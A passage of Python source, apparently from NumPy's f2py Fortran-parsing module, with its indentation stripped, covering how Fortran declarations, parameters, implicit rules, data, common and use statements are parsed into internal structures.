groupcounter = groupcounter + 1
return
gotnextfile = 0
analyzeline(m, pat[1], line)
expectbegin = 0
elif pat[1] == 'endif':
pass
elif pat[1] == 'contains':
if ignorecontains:
return
if 0 <= skipblocksuntil <= groupcounter:
return
skipblocksuntil = groupcounter
else:
if 0 <= skipblocksuntil <= groupcounter:
return
analyzeline(m, pat[1], line)
def markouterparen(line):
l = ''
f = 0
for c in line:
if c == '(':
f = f + 1
if f == 1:
l = l + '@(@'
continue
elif c == ')':
f = f - 1
if f == 0:
l = l + '@)@'
continue
l = l + c
return l
def markoutercomma(line, comma=','):
l = ''
f = 0
cc = ''
for c in line:
if (not cc or cc == ')') and c == '(':
f = f + 1
cc = ')'
elif not cc and c == '\'' and (not l or l[-1] != '\\'):
f = f + 1
cc = '\''
elif c == cc:
f = f - 1
if f == 0:
cc = ''
elif c == comma and f == 0:
l = l + '@' + comma + '@'
continue
l = l + c
assert not f, repr((f, line, l, cc))
return l
def unmarkouterparen(line):
r = line.replace('@(@', '(').replace('@)@', ')')
return r
def appenddecl(decl, decl2, force=1):
if not decl:
decl = {}
if not decl2:
return decl
if decl is decl2:
return decl
for k in list(decl2.keys()):
if k == 'typespec':
if force or k not in decl:
decl[k] = decl2[k]
elif k == 'attrspec':
for l in decl2[k]:
decl = setattrspec(decl, l, force)
elif k == 'kindselector':
decl = setkindselector(decl, decl2[k], force)
elif k == 'charselector':
decl = setcharselector(decl, decl2[k], force)
elif k in ['=', 'typename']:
if force or k not in decl:
decl[k] = decl2[k]
elif k == 'note':
pass
elif k in ['intent', 'check', 'dimension', 'optional', 'required']:
errmess('appenddecl: "%s" not implemented.\n' % k)
else:
raise Exception('appenddecl: Unknown variable definition key:' +
str(k))
return decl
selectpattern = re.compile(
r'\s*(?P<this>(@\(@.*?@\)@|[*][\d*]+|[*]\s*@\(@.*?@\)@|))(?P<after>.*)\Z', re.I)
nameargspattern = re.compile(
r'\s*(?P<name>\b[\w$]+\b)\s*(@\(@\s*(?P<args>[\w\s,]*)\s*@\)@|)\s*((result(\s*@\(@\s*(?P<result>\b[\w$]+\b)\s*@\)@|))|(bind\s*@\(@\s*(?P<bind>.*)\s*@\)@))*\s*\Z', re.I)
callnameargspattern = re.compile(
r'\s*(?P<name>\b[\w$]+\b)\s*@\(@\s*(?P<args>.*)\s*@\)@\s*\Z', re.I)
real16pattern = re.compile(
r'([-+]?(?:\d+(?:\.\d*)?|\d*\.\d+))[dD]((?:[-+]?\d+)?)')
real8pattern = re.compile(
r'([-+]?((?:\d+(?:\.\d*)?|\d*\.\d+))[eE]((?:[-+]?\d+)?)|(\d+\.\d*))')
_intentcallbackpattern = re.compile(r'intent\s*\(.*?\bcallback\b', re.I)
def _is_intent_callback(vdecl):
for a in vdecl.get('attrspec', []):
if _intentcallbackpattern.match(a):
return 1
return 0
def _resolvenameargspattern(line):
line = markouterparen(line)
m1 = nameargspattern.match(line)
if m1:
return m1.group('name'), m1.group('args'), m1.group('result'), m1.group('bind')
m1 = callnameargspattern.match(line)
if m1:
return m1.group('name'), m1.group('args'), None, None
return None, [], None, None
def analyzeline(m, case, line):
global groupcounter, groupname, groupcache, grouplist, filepositiontext
global currentfilename, f77modulename, neededinterface, neededmodule
global expectbegin, gotnextfile, previous_context
block = m.group('this')
if case != 'multiline':
previous_context = None
if expectbegin and case not in ['begin', 'call', 'callfun', 'type'] \
and not skipemptyends and groupcounter < 1:
newname = os.path.basename(currentfilename).split('.')[0]
outmess(
'analyzeline: no group yet. Creating program group with name "%s".\n' % newname)
gotnextfile = 0
groupcounter = groupcounter + 1
groupname[groupcounter] = 'program'
groupcache[groupcounter] = {}
grouplist[groupcounter] = []
groupcache[groupcounter]['body'] = []
groupcache[groupcounter]['vars'] = {}
groupcache[groupcounter]['block'] = 'program'
groupcache[groupcounter]['name'] = newname
groupcache[groupcounter]['from'] = 'fromsky'
expectbegin = 0
if case in ['begin', 'call', 'callfun']:
# Crack line => block,name,args,result
block = block.lower()
if re.match(r'block\s*data', block, re.I):
block = 'block data'
if re.match(r'python\s*module', block, re.I):
block = 'python module'
name, args, result, bind = _resolvenameargspattern(m.group('after'))
if name is None:
if block == 'block data':
name = '_BLOCK_DATA_'
else:
name = ''
if block not in ['interface', 'block data']:
outmess('analyzeline: No name/args pattern found for line.\n')
previous_context = (block, name, groupcounter)
if args:
args = rmbadname([x.strip()
for x in markoutercomma(args).split('@,@')])
else:
args = []
if '' in args:
while '' in args:
args.remove('')
outmess(
'analyzeline: argument list is malformed (missing argument).\n')
# end of crack line => block,name,args,result
needmodule = 0
needinterface = 0
if case in ['call', 'callfun']:
needinterface = 1
if 'args' not in groupcache[groupcounter]:
return
if name not in groupcache[groupcounter]['args']:
return
for it in grouplist[groupcounter]:
if it['name'] == name:
return
if name in groupcache[groupcounter]['interfaced']:
return
block = {'call': 'subroutine', 'callfun': 'function'}[case]
if f77modulename and neededmodule == -1 and groupcounter <= 1:
neededmodule = groupcounter + 2
needmodule = 1
if block != 'interface':
needinterface = 1
# Create new block(s)
groupcounter = groupcounter + 1
groupcache[groupcounter] = {}
grouplist[groupcounter] = []
if needmodule:
if verbose > 1:
outmess('analyzeline: Creating module block %s\n' %
repr(f77modulename), 0)
groupname[groupcounter] = 'module'
groupcache[groupcounter]['block'] = 'python module'
groupcache[groupcounter]['name'] = f77modulename
groupcache[groupcounter]['from'] = ''
groupcache[groupcounter]['body'] = []
groupcache[groupcounter]['externals'] = []
groupcache[groupcounter]['interfaced'] = []
groupcache[groupcounter]['vars'] = {}
groupcounter = groupcounter + 1
groupcache[groupcounter] = {}
grouplist[groupcounter] = []
if needinterface:
if verbose > 1:
outmess('analyzeline: Creating additional interface block (groupcounter=%s).\n' % (
groupcounter), 0)
groupname[groupcounter] = 'interface'
groupcache[groupcounter]['block'] = 'interface'
groupcache[groupcounter]['name'] = 'unknown_interface'
groupcache[groupcounter]['from'] = '%s:%s' % (
groupcache[groupcounter - 1]['from'], groupcache[groupcounter - 1]['name'])
groupcache[groupcounter]['body'] = []
groupcache[groupcounter]['externals'] = []
groupcache[groupcounter]['interfaced'] = []
groupcache[groupcounter]['vars'] = {}
groupcounter = groupcounter + 1
groupcache[groupcounter] = {}
grouplist[groupcounter] = []
groupname[groupcounter] = block
groupcache[groupcounter]['block'] = block
if not name:
name = 'unknown_' + block
groupcache[groupcounter]['prefix'] = m.group('before')
groupcache[groupcounter]['name'] = rmbadname1(name)
groupcache[groupcounter]['result'] = result
if groupcounter == 1:
groupcache[groupcounter]['from'] = currentfilename
else:
if f77modulename and groupcounter == 3:
groupcache[groupcounter]['from'] = '%s:%s' % (
groupcache[groupcounter - 1]['from'], currentfilename)
else:
groupcache[groupcounter]['from'] = '%s:%s' % (
groupcache[groupcounter - 1]['from'], groupcache[groupcounter - 1]['name'])
for k in list(groupcache[groupcounter].keys()):
if not groupcache[groupcounter][k]:
del groupcache[groupcounter][k]
groupcache[groupcounter]['args'] = args
groupcache[groupcounter]['body'] = []
groupcache[groupcounter]['externals'] = []
groupcache[groupcounter]['interfaced'] = []
groupcache[groupcounter]['vars'] = {}
groupcache[groupcounter]['entry'] = {}
# end of creation
if block == 'type':
groupcache[groupcounter]['varnames'] = []
if case in ['call', 'callfun']: # set parents variables
if name not in groupcache[groupcounter - 2]['externals']:
groupcache[groupcounter - 2]['externals'].append(name)
groupcache[groupcounter]['vars'] = copy.deepcopy(
groupcache[groupcounter - 2]['vars'])
try:
del groupcache[groupcounter]['vars'][name][
groupcache[groupcounter]['vars'][name]['attrspec'].index('external')]
except:
pass
if block in ['function', 'subroutine']: # set global attributes
try:
groupcache[groupcounter]['vars'][name] = appenddecl(
groupcache[groupcounter]['vars'][name], groupcache[groupcounter - 2]['vars'][''])
except:
pass
if case == 'callfun': # return type
if result and result in groupcache[groupcounter]['vars']:
if not name == result:
groupcache[groupcounter]['vars'][name] = appenddecl(
groupcache[groupcounter]['vars'][name], groupcache[groupcounter]['vars'][result])
# if groupcounter>1: # name is interfaced
try:
groupcache[groupcounter - 2]['interfaced'].append(name)
except:
pass
if block == 'function':
t = typespattern[0].match(m.group('before') + ' ' + name)
if t:
typespec, selector, attr, edecl = cracktypespec0(
t.group('this'), t.group('after'))
updatevars(typespec, selector, attr, edecl)
if case in ['call', 'callfun']:
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1 # end routine
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1 # end interface
elif case == 'entry':
name, args, result, bind = _resolvenameargspattern(m.group('after'))
if name is not None:
if args:
args = rmbadname([x.strip()
for x in markoutercomma(args).split('@,@')])
else:
args = []
assert result is None, repr(result)
groupcache[groupcounter]['entry'][name] = args
previous_context = ('entry', name, groupcounter)
elif case == 'type':
typespec, selector, attr, edecl = cracktypespec0(
block, m.group('after'))
last_name = updatevars(typespec, selector, attr, edecl)
if last_name is not None:
previous_context = ('variable', last_name, groupcounter)
elif case in ['dimension', 'intent', 'optional', 'required', 'external', 'public', 'private', 'intrisic']:
edecl = groupcache[groupcounter]['vars']
ll = m.group('after').strip()
i = ll.find('::')
if i < 0 and case == 'intent':
i = markouterparen(ll).find('@)@') - 2
ll = ll[:i + 1] + '::' + ll[i + 1:]
i = ll.find('::')
if ll[i:] == '::' and 'args' in groupcache[groupcounter]:
outmess('All arguments will have attribute %s%s\n' %
(m.group('this'), ll[:i]))
ll = ll + ','.join(groupcache[groupcounter]['args'])
if i < 0:
i = 0
pl = ''
else:
pl = ll[:i].strip()
ll = ll[i + 2:]
ch = markoutercomma(pl).split('@,@')
if len(ch) > 1:
pl = ch[0]
outmess('analyzeline: cannot handle multiple attributes without type specification. Ignoring %r.\n' % (
','.join(ch[1:])))
last_name = None
for e in [x.strip() for x in markoutercomma(ll).split('@,@')]:
m1 = namepattern.match(e)
if not m1:
if case in ['public', 'private']:
k = ''
else:
print(m.groupdict())
outmess('analyzeline: no name pattern found in %s statement for %s. Skipping.\n' % (
case, repr(e)))
continue
else:
k = rmbadname1(m1.group('name'))
if k not in edecl:
edecl[k] = {}
if case == 'dimension':
ap = case + m1.group('after')
if case == 'intent':
ap = m.group('this') + pl
if _intentcallbackpattern.match(ap):
if k not in groupcache[groupcounter]['args']:
if groupcounter > 1:
if '__user__' not in groupcache[groupcounter - 2]['name']:
outmess(
'analyzeline: missing __user__ module (could be nothing)\n')
# fixes ticket 1693
if k != groupcache[groupcounter]['name']:
outmess('analyzeline: appending intent(callback) %s'
' to %s arguments\n' % (k, groupcache[groupcounter]['name']))
groupcache[groupcounter]['args'].append(k)
else:
errmess(
'analyzeline: intent(callback) %s is ignored' % (k))
else:
errmess('analyzeline: intent(callback) %s is already'
' in argument list' % (k))
if case in ['optional', 'required', 'public', 'external', 'private', 'intrisic']:
ap = case
if 'attrspec' in edecl[k]:
edecl[k]['attrspec'].append(ap)
else:
edecl[k]['attrspec'] = [ap]
if case == 'external':
if groupcache[groupcounter]['block'] == 'program':
outmess('analyzeline: ignoring program arguments\n')
continue
if k not in groupcache[groupcounter]['args']:
continue
if 'externals' not in groupcache[groupcounter]:
groupcache[groupcounter]['externals'] = []
groupcache[groupcounter]['externals'].append(k)
last_name = k
groupcache[groupcounter]['vars'] = edecl
if last_name is not None:
previous_context = ('variable', last_name, groupcounter)
elif case == 'parameter':
edecl = groupcache[groupcounter]['vars']
ll = m.group('after').strip()[1:-1]
last_name = None
for e in markoutercomma(ll).split('@,@'):
try:
k, initexpr = [x.strip() for x in e.split('=')]
except:
outmess(
'analyzeline: could not extract name,expr in parameter statement "%s" of "%s"\n' % (e, ll))
continue
params = get_parameters(edecl)
k = rmbadname1(k)
if k not in edecl:
edecl[k] = {}
if '=' in edecl[k] and (not edecl[k]['='] == initexpr):
outmess('analyzeline: Overwriting the value of parameter "%s" ("%s") with "%s".\n' % (
k, edecl[k]['='], initexpr))
t = determineexprtype(initexpr, params)
if t:
if t.get('typespec') == 'real':
tt = list(initexpr)
for m in real16pattern.finditer(initexpr):
tt[m.start():m.end()] = list(
initexpr[m.start():m.end()].lower().replace('d', 'e'))
initexpr = ''.join(tt)
elif t.get('typespec') == 'complex':
initexpr = initexpr[1:].lower().replace('d', 'e').\
replace(',', '+1j*(')
try:
v = eval(initexpr, {}, params)
except (SyntaxError, NameError, TypeError) as msg:
errmess('analyzeline: Failed to evaluate %r. Ignoring: %s\n'
% (initexpr, msg))
continue
edecl[k]['='] = repr(v)
if 'attrspec' in edecl[k]:
edecl[k]['attrspec'].append('parameter')
else:
edecl[k]['attrspec'] = ['parameter']
last_name = k
groupcache[groupcounter]['vars'] = edecl
if last_name is not None:
previous_context = ('variable', last_name, groupcounter)
elif case == 'implicit':
if m.group('after').strip().lower() == 'none':
groupcache[groupcounter]['implicit'] = None
elif m.group('after'):
if 'implicit' in groupcache[groupcounter]:
impl = groupcache[groupcounter]['implicit']
else:
impl = {}
if impl is None:
outmess(
'analyzeline: Overwriting earlier "implicit none" statement.\n')
impl = {}
for e in markoutercomma(m.group('after')).split('@,@'):
decl = {}
m1 = re.match(
r'\s*(?P<this>.*?)\s*(\(\s*(?P<after>[a-z-, ]+)\s*\)\s*|)\Z', e, re.I)
if not m1:
outmess(
'analyzeline: could not extract info of implicit statement part "%s"\n' % (e))
continue
m2 = typespattern4implicit.match(m1.group('this'))
if not m2:
outmess(
'analyzeline: could not extract types pattern of implicit statement part "%s"\n' % (e))
continue
typespec, selector, attr, edecl = cracktypespec0(
m2.group('this'), m2.group('after'))
kindselect, charselect, typename = cracktypespec(
typespec, selector)
decl['typespec'] = typespec
decl['kindselector'] = kindselect
decl['charselector'] = charselect
decl['typename'] = typename
for k in list(decl.keys()):
if not decl[k]:
del decl[k]
for r in markoutercomma(m1.group('after')).split('@,@'):
if '-' in r:
try:
begc, endc = [x.strip() for x in r.split('-')]
except:
outmess(
'analyzeline: expected "<char>-<char>" instead of "%s" in range list of implicit statement\n' % r)
continue
else:
begc = endc = r.strip()
if not len(begc) == len(endc) == 1:
outmess(
'analyzeline: expected "<char>-<char>" instead of "%s" in range list of implicit statement (2)\n' % r)
continue
for o in range(ord(begc), ord(endc) + 1):
impl[chr(o)] = decl
groupcache[groupcounter]['implicit'] = impl
elif case == 'data':
ll = []
dl = ''
il = ''
f = 0
fc = 1
inp = 0
for c in m.group('after'):
if not inp:
if c == "'":
fc = not fc
if c == '/' and fc:
f = f + 1
continue
if c == '(':
inp = inp + 1
elif c == ')':
inp = inp - 1
if f == 0:
dl = dl + c
elif f == 1:
il = il + c
elif f == 2:
dl = dl.strip()
if dl.startswith(','):
dl = dl[1:].strip()
ll.append([dl, il])
dl = c
il = ''
f = 0
if f == 2:
dl = dl.strip()
if dl.startswith(','):
dl = dl[1:].strip()
ll.append([dl, il])
vars = {}
if 'vars' in groupcache[groupcounter]:
vars = groupcache[groupcounter]['vars']
last_name = None
for l in ll:
l = [x.strip() for x in l]
if l[0][0] == ',':
l[0] = l[0][1:]
if l[0][0] == '(':
outmess(
'analyzeline: implied-DO list "%s" is not supported. Skipping.\n' % l[0])
continue
i = 0
j = 0
llen = len(l[1])
for v in rmbadname([x.strip() for x in markoutercomma(l[0]).split('@,@')]):
if v[0] == '(':
outmess(
'analyzeline: implied-DO list "%s" is not supported. Skipping.\n' % v)
# XXX: subsequent init expressions may get wrong values.
# Ignoring since data statements are irrelevant for
# wrapping.
continue
fc = 0
while (i < llen) and (fc or not l[1][i] == ','):
if l[1][i] == "'":
fc = not fc
i = i + 1
i = i + 1
if v not in vars:
vars[v] = {}
if '=' in vars[v] and not vars[v]['='] == l[1][j:i - 1]:
outmess('analyzeline: changing init expression of "%s" ("%s") to "%s"\n' % (
v, vars[v]['='], l[1][j:i - 1]))
vars[v]['='] = l[1][j:i - 1]
j = i
last_name = v
groupcache[groupcounter]['vars'] = vars
if last_name is not None:
previous_context = ('variable', last_name, groupcounter)
elif case == 'common':
line = m.group('after').strip()
if not line[0] == '/':
line = '//' + line
cl = []
f = 0
bn = ''
ol = ''
for c in line:
if c == '/':
f = f + 1
continue
if f >= 3:
bn = bn.strip()
if not bn:
bn = '_BLNK_'
cl.append([bn, ol])
f = f - 2
bn = ''
ol = ''
if f % 2:
bn = bn + c
else:
ol = ol + c
bn = bn.strip()
if not bn:
bn = '_BLNK_'
cl.append([bn, ol])
commonkey = {}
if 'common' in groupcache[groupcounter]:
commonkey = groupcache[groupcounter]['common']
for c in cl:
if c[0] not in commonkey:
commonkey[c[0]] = []
for i in [x.strip() for x in markoutercomma(c[1]).split('@,@')]:
if i:
commonkey[c[0]].append(i)
groupcache[groupcounter]['common'] = commonkey
previous_context = ('common', bn, groupcounter)
elif case == 'use':
m1 = re.match(
r'\A\s*(?P<name>\b[\w]+\b)\s*((,(\s*\bonly\b\s*:|(?P<notonly>))\s*(?P<list>.*))|)\s*\Z', m.group('after'), re.I)
if m1:
mm = m1.groupdict()
if 'use' not in groupcache[groupcounter]:
groupcache[groupcounter]['use'] = {}
name = m1.group('name')
groupcache[groupcounter]['use'][name] = {}
isonly = 0
if 'list' in mm and mm['list'] is not None:
if 'notonly' in mm and mm['notonly'] is None:
isonly = 1
groupcache[groupcounter]['use'][name]['only'] = isonly
ll = [x.strip() for x in mm['list'].split(',')]
rl = {}
for l in ll:
if '=' in l:
m2 = re.match(
r'\A\s*(?P<local>\b[\w]+\b)\s*=\s*>\s*(?P<use>\b[\w]+\b)\s*\Z', l, re.I)
if m2:
rl[m2.group('local').strip()] = m2.group(
'use').strip()
else:
outmess(
'analyzeline: Not local=>use pattern found in %s\n' % repr(l))
else:
rl[l] = l
groupcache[groupcounter]['use'][name]['map'] = rl
else:
pass
else:
print(m.groupdict())
outmess('analyzeline: Could not crack the use statement.\n')
elif case in ['f2pyenhancements']:
if 'f2pyenhancements' not in groupcache[groupcounter]:
groupcache[groupcounter]['f2pyenhancements'] = {}
d = groupcache[groupcounter]['f2pyenhancements']
if m.group('this') == 'usercode' and 'usercode' in d:
if isinstance(d['usercode'], str):
d['usercode'] = [d['usercode']]
d['usercode'].append(m.group('after'))
else:
d[m.group('this')] = m.group('after')
elif case == 'multiline':
if previous_context is None:
if verbose:
outmess('analyzeline: No context for multiline block.\n')
return
gc = groupcounter
appendmultiline(groupcache[gc],
previous_context[:2],
m.group('this'))
else:
if verbose > 1:
print(m.groupdict())
outmess('analyzeline: No code implemented for line.\n')
def appendmultiline(group, context_name, ml):
if 'f2pymultilines' not in group:
group['f2pymultilines'] = {}
d = group['f2pymultilines']
if context_name not in d:
d[context_name] = []
d[context_name].append(ml)
return
def cracktypespec0(typespec, ll):
selector = None
attr = None
if re.match(r'double\s*complex', typespec, re.I):
typespec = 'double complex'
elif re.match(r'double\s*precision', typespec, re.I):
typespec = 'double precision'
else:
typespec = typespec.strip().lower()
m1 = selectpattern.match(markouterparen(ll))
if not m1:
outmess(
'cracktypespec0: no kind/char_selector pattern found for line.\n')
return
d = m1.groupdict()
for k in list(d.keys()):
d[k] = unmarkouterparen(d[k])
if typespec in ['complex', 'integer', 'logical', 'real', 'character', 'type']:
selector = d['this']
ll = d['after']
i = ll.find('::')
if i >= 0:
attr = ll[:i].strip()
ll = ll[i + 2:]
return typespec, selector, attr, ll
#####
namepattern = re.compile(r'\s*(?P<name>\b[\w]+\b)\s*(?P<after>.*)\s*\Z', re.I)
kindselector = re.compile(
r'\s*(\(\s*(kind\s*=)?\s*(?P<kind>.*)\s*\)|[*]\s*(?P<kind2>.*?))\s*\Z', re.I)
charselector = re.compile(
r'\s*(\((?P<lenkind>.*)\)|[*]\s*(?P<charlen>.*))\s*\Z', re.I)
lenkindpattern = re.compile(
r'\s*(kind\s*=\s*(?P<kind>.*?)\s*(@,@\s*len\s*=\s*(?P<len>.*)|)|(len\s*=\s*|)(?P<len2>.*?)\s*(@,@\s*(kind\s*=\s*|)(?P<kind2>.*)|))\s*\Z', re.I)
lenarraypattern = re.compile(
r'\s*(@\(@\s*(?!/)\s*(?P<array>.*?)\s*@\)@\s*[*]\s*(?P<len>.*?)|([*]\s*(?P<len2>.*?)|)\s*(@\(@\s*(?!/)\s*(?P<array2>.*?)\s*@\)@|))\s*(=\s*(?P<init>.*?)|(@\(@|)/\s*(?P<init2>.*?)\s*/(@\)@|)|)\s*\Z', re.I)
def removespaces(expr):
expr = expr.strip()
if len(expr) <= 1:
return expr
expr2 = expr[0]
for i in range(1, len(expr) - 1):
if (expr[i] == ' ' and
((expr[i + 1] in "()[]{}=+-/* ") or
(expr[i - 1] in "()[]{}=+-/* "))):
continue
expr2 = expr2 + expr[i]
expr2 = expr2 + expr[-1]
return expr2
def markinnerspaces(line):
l = ''
f = 0
cc = '\''
cb = ''
for c in line:
if cb == '\\' and c in ['\\', '\'', '"']:
l = l + c
cb = c
continue
if f == 0 and c in ['\'', '"']:
cc = c
if c == cc:
f = f + 1
elif c == cc:
f = f - 1
elif c == ' ' and f == 1:
l = l + '@_@'
continue
l = l + c
cb = c
return l
def updatevars(typespec, selector, attrspec, entitydecl):
global groupcache, groupcounter
last_name = None
kindselect, charselect, typename = cracktypespec(typespec, selector)
if attrspec:
attrspec = [x.strip() for x in markoutercomma(attrspec).split('@,@')]
l = []
c = re.compile(r'(?P<start>[a-zA-Z]+)')
for a in attrspec:
if not a:
continue
m = c.match(a)
if m:
s = m.group('start').lower()
a = s + a[len(s):]
l.append(a)
attrspec = l
el = [x.strip() for x in markoutercomma(entitydecl).split('@,@')]
el1 = []
for e in el:
for e1 in [x.strip() for x in markoutercomma(removespaces(markinnerspaces(e)), comma=' ').split('@ @')]:
if e1:
el1.append(e1.replace('@_@', ' '))
for e in el1:
m = namepattern.match(e)
if not m:
outmess(
'updatevars: no name pattern found for entity=%s. Skipping.\n' % (repr(e)))
continue
ename = rmbadname1(m.group('name'))
edecl = {}
if ename in groupcache[groupcounter]['vars']:
edecl = groupcache[groupcounter]['vars'][ename].copy()
not_has_typespec = 'typespec' not in edecl
if not_has_typespec:
edecl['typespec'] = typespec
elif typespec and (not typespec == edecl['typespec']):
outmess('updatevars: attempt to change the type of "%s" ("%s") to "%s". Ignoring.\n' % (
ename, edecl['typespec'], typespec))
if 'kindselector' not in edecl:
edecl['kindselector'] = copy.copy(kindselect)
elif kindselect:
for k in list(kindselect.keys()):
if k in edecl['kindselector'] and (not kindselect[k] == edecl['kindselector'][k]):
outmess('updatevars: attempt to change the kindselector "%s" of "%s" ("%s") to "%s". Ignoring.\n' % (
k, ename, edecl['kindselector'][k], kindselect[k]))
else:
edecl['kindselector'][k] = copy.copy(kindselect[k])
if 'charselector' not in edecl and charselect:
if not_has_typespec:
edecl['charselector'] = charselect
else:
errmess('updatevars:%s: attempt to change empty charselector to %r. Ignoring.\n'
% (ename, charselect))
elif charselect:
for k in list(charselect.keys()):
if k in edecl['charselector'] and (not charselect[k] == edecl['charselector'][k]):
outmess('updatevars: attempt to change the charselector "%s" of "%s" ("%s") to "%s". Ignoring.\n' % (
k, ename, edecl['charselector'][k], charselect[k]))
else:
edecl['charselector'][k] = copy.copy(charselect[k])
if 'typename' not in edecl:
edecl['typename'] = typename
elif typename and (not edecl['typename'] == typename):
outmess('updatevars: attempt to change the typename of "%s" ("%s") to "%s". Ignoring.\n' % (
ename, edecl['typename'], typename))
if 'attrspec' not in edecl:
edecl['attrspec'] = copy.copy(attrspec)
elif attrspec:
for a in attrspec:
if a not in edecl['attrspec']:
edecl['attrspec'].append(a)
else:
edecl['typespec'] = copy.copy(typespec)
edecl['kindselector'] = copy.copy(kindselect)
edecl['charselector'] = copy.copy(charselect)
edecl['typename'] = typename
edecl['attrspec'] = copy.copy(attrspec)
if m.group('after'):
m1 = lenarraypattern.match(markouterparen(m.group('after')))
if m1:
d1 = m1.groupdict()
for lk in ['len', 'array', 'init']:
if d1[lk + '2'] is not None:
d1[lk] = d1[lk + '2']
del d1[lk + '2']
for k in list(d1.keys()):
if d1[k] is not None:
d1[k] = unmarkouterparen(d1[k])
else:
del d1[k]
if 'len' in d1 and 'array' in d1:
if d1['len'] == '':
d1['len'] = d1['array']
del d1['array']
else:
d1['array'] = d1['array'] + ',' + d1['len']
del d1['len']
errmess('updatevars: "%s %s" is mapped to "%s %s(%s)"\n' % (
typespec, e, typespec, ename, d1['array']))
if 'array' in d1:
dm = 'dimension(%s)' % d1['array']
if 'attrspec' not in edecl or (not edecl['attrspec']):
edecl['attrspec'] = [dm]
else:
edecl['attrspec'].append(dm)
for dm1 in edecl['attrspec']:
if dm1[:9] == 'dimension' and dm1 != dm:
del edecl['attrspec'][-1]
errmess('updatevars:%s: attempt to change %r to %r. Ignoring.\n'
% (ename, dm1, dm))
break
if 'len' in d1:
if typespec in ['complex', 'integer', 'logical', 'real']:
if ('kindselector' not in edecl) or (not edecl['kindselector']):
edecl['kindselector'] = {}
edecl['kindselector']['*'] = d1['len']
elif typespec == 'character':
if ('charselector' not in edecl) or (not edecl['charselector']):
edecl['charselector'] = {}
if 'len' in edecl['charselector']:
del edecl['charselector']['len']
edecl['charselector']['*'] = d1['len']
if 'init' in d1:
if '=' in edecl and (not edecl['='] == d1['init']):
outmess('updatevars: attempt to change the init expression of "%s" ("%s") to "%s". Ignoring.\n' % (
ename, edecl['='], d1['init']))
else:
edecl['='] = d1['init']
else:
outmess('updatevars: could not crack entity declaration "%s". Ignoring.\n' % (
ename + m.group('after')))
for k in list(edecl.keys()):
if not edecl[k]:
del edecl[k]
groupcache[groupcounter]['vars'][ename] = edecl
if 'varnames' in groupcache[groupcounter]:
groupcache[groupcounter]['varnames'].append(ename)
last_name = ename
return last_name
def cracktypespec(typespec, selector):
kindselect = None
charselect = None
typename = None
if selector:
if typespec in ['complex', 'integer', 'logical', 'real']:
kindselect = kindselector.match(selector)
if not kindselect:
outmess(
'cracktypespec: no kindselector pattern found for %s\n' % (repr(selector)))
return
kindselect = kindselect.groupdict()
kindselect['*'] = kindselect['kind2']
del kindselect['kind2']
for k in list(kindselect.keys()):
if not kindselect[k]:
del kindselect[k]
for k, i in list(kindselect.items()):
kindselect[k] = rmbadname1(i)
elif typespec == 'character':
charselect = charselector.match(selector)
if not charselect:
outmess(
'cracktypespec: no charselector pattern found for %s\n' % (repr(selector)))
return
charselect = charselect.groupdict()
charselect['*'] = charselect['charlen']
del charselect['charlen']
if charselect['lenkind']:
lenkind = lenkindpattern.match(
markoutercomma(charselect['lenkind']))
lenkind = lenkind.groupdict()
for lk in ['len', 'kind']:
if lenkind[lk + '2']:
lenkind[lk] = lenkind[lk + '2']
charselect[lk] = lenkind[lk]
del lenkind[lk + '2']
del charselect['lenkind']
for k in list(charselect.keys()):
if not charselect[k]:
del charselect[k]
for k, i in list(charselect.items()):
charselect[k] = rmbadname1(i)
elif typespec == 'type':
typename = re.match(r'\s*\(\s*(?P<name>\w+)\s*\)', selector, re.I)
if typename:
typename = typename.group('name')
else:
outmess('cracktypespec: no typename found in %s\n' %
(repr(typespec + selector)))
else:
outmess('cracktypespec: no selector used for %s\n' %
(repr(selector)))
return kindselect, charselect, typename
######
def setattrspec(decl, attr, force=0):
if not decl:
decl = {}
if not attr:
return decl
if 'attrspec' not in decl:
decl['attrspec'] = [attr]
return decl
if force:
decl['attrspec'].append(attr)
if attr in decl['attrspec']:
return decl
if attr == 'static' and 'automatic' not in decl['attrspec']:
decl['attrspec'].append(attr)
elif attr == 'automatic' and 'static' not in decl['attrspec']:
decl['attrspec'].append(attr)
elif attr == 'public' and 'private' not in decl['attrspec']:
decl['attrspec'].append(attr)
elif attr == 'private' and 'public' not in decl['attrspec']:
decl['attrspec'].append(attr)
else:
decl['attrspec'].append(attr)
return decl
def setkindselector(decl, sel, force=0):
if not decl:
decl = {}
if not sel:
return decl
if 'kindselector' not in decl:
decl['kindselector'] = sel
return decl
for k in list(sel.keys()):
if force or k not in decl['kindselector']:
decl['kindselector'][k] = sel[k]
return decl
def setcharselector(decl, sel, force=0):
if not decl:
decl = {}
if not sel:
return decl
if 'charselector' not in decl:
decl['charselector'] = sel
return decl
for k in list(sel.keys()):
if force or k not in decl['charselector']:
decl['charselector'][k] = sel[k]
return decl
def getblockname(block, unknown='unknown'):
if 'name' in block:
return block['name']
return unknown
# post processing
def setmesstext(block):
global filepositiontext
try:
filepositiontext = 'In: %s:%s\n' % (block['from'], block['name'])
except:
pass
def get_usedict(block):
usedict = {}
if 'parent_block' in block:
usedict = get_usedict(block['parent_block'])
if 'use' in block:
usedict.update(block['use'])
return usedict
def get_useparameters(block, param_map=None):
global f90modulevars
if param_map is None:
param_map = {}
usedict = get_usedict(block)
if not usedict:
return param_map
for usename, mapping in list(usedict.items()):
usename = usename.lower()
if usename not in f90modulevars:
outmess('get_useparameters: no module %s info used by %s\n' %
(usename, block.get('name')))
continue
mvars = f90modulevars[usename]
params = get_parameters(mvars)
if not params:
continue
# XXX: apply mapping
if mapping:
errmess('get_useparameters: mapping for %s not impl.' % (mapping))
for k, v in list(params.items()):
if k in param_map:
outmess('get_useparameters: overriding parameter %s with'
' value from module %s' % (repr(k), repr(usename)))
param_map[k] = v
return param_map
def postcrack2(block, tab='', param_map=None):
global f90modulevars
if not f90modulevars:
return block
if isinstance(block, list):
ret = []
for g in block:
g = postcrack2(g, tab=tab + '\t', param_map=param_map)
ret.append(g)
return ret
setmesstext(block)
outmess('%sBlock: %s\n' % (tab, block['name']), 0)
if param_map is None:
param_map = get_useparameters(block)
if param_map is not None and 'vars' in block:
vars = block['vars']
for n in list(vars.keys()):
var = vars[n]
if 'kindselector' in var:
kind = var['kindselector']
if 'kind' in kind:
val = kind['kind']
if val in param_map:
kind['kind'] = param_map[val]
